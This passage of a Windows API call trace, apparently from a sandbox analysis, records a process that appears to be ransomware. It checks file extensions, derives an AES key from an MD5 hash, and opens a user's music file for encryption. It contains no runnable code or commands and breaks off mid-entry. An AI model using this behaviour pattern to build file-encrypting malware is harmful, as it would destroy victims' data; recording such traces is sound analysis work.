lpString1="GfFOaa4l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.685] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fFOaa4l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.685] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FOaa4l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.685] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Oaa4l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.685] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aa4l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.685] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a4l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.685] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.685] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.685] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.685] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.685] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.685] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.685] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.685] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.685] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.685] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.685] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.685] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Hj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.685] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="j3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.685] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.685] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.685] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.685] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0185.685] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0185.685] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0185.685] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0185.685] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0185.685] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0185.686] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0185.686] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0185.686] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0185.686] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0185.686] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0185.686] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0185.686] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.686] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7de63150, ftCreationTime.dwHighDateTime=0x1d5e79c, ftLastAccessTime.dwLowDateTime=0x3328d30, ftLastAccessTime.dwHighDateTime=0x1d5db32, ftLastWriteTime.dwLowDateTime=0x3328d30, ftLastWriteTime.dwHighDateTime=0x1d5db32, nFileSizeHigh=0x0, nFileSizeLow=0xf5b7, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="iytLsFHuHj3z6gYMj.m4a", cAlternateFileName="IYTLSF~1.M4A")) returned 0x90ae18 [0185.686] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0185.686] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.686] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0185.686] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.686] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0185.686] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0185.686] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.686] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0185.687] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.687] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.687] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0185.687] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0185.687] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0185.687] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.687] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.687] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0185.687] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0185.687] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0185.687] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c88) returned 1 [0185.688] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.688] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.688] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0185.688] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0185.688] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0185.688] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.688] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.688] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.688] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0185.688] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0185.689] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0185.689] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.689] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.689] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.689] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.689] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0185.689] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.689] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.689] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0185.689] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0185.689] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0185.689] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0185.689] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0185.689] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0185.689] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0185.689] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0185.689] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0185.689] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0185.689] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.689] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.689] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0185.689] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0185.689] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0185.690] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0185.690] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0185.690] CryptCreateHash (in: hProv=0x9c0c88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0185.690] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.690] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.690] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.690] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.690] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0185.690] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.690] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.690] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0185.690] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0185.690] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0185.690] CryptHashData (hHash=0x90af58, pbData=0x8dee70, dwDataLen=0x19, dwFlags=0x1) returned 1 [0185.690] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.690] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.690] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.690] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0185.690] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0185.690] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0185.690] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0185.690] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0185.690] CryptDeriveKey (in: hProv=0x9c0c88, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90aed8) returned 1 [0185.691] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.691] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.691] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.691] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.691] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.691] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0185.691] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0185.691] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0185.691] CryptDestroyHash (hHash=0x90af58) returned 1 [0185.691] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.691] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.691] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.691] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.691] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.692] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\rwwrmzhuo4\\egffoaa4l\\iytlsfhuhj3z6gymj.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0185.692] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0185.692] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0185.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0185.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0185.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0185.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0185.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0185.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0185.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0185.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0185.692] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0185.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0185.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0185.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0185.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0185.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0185.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0185.693] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0185.693] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0185.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0185.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0185.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0185.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0185.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0185.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0185.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0185.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0185.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0185.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0185.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0185.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0185.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0185.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0185.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0185.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0185.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0185.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0185.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0185.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0185.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0185.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0185.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0185.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0185.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0185.694] RtlAllocateHeap 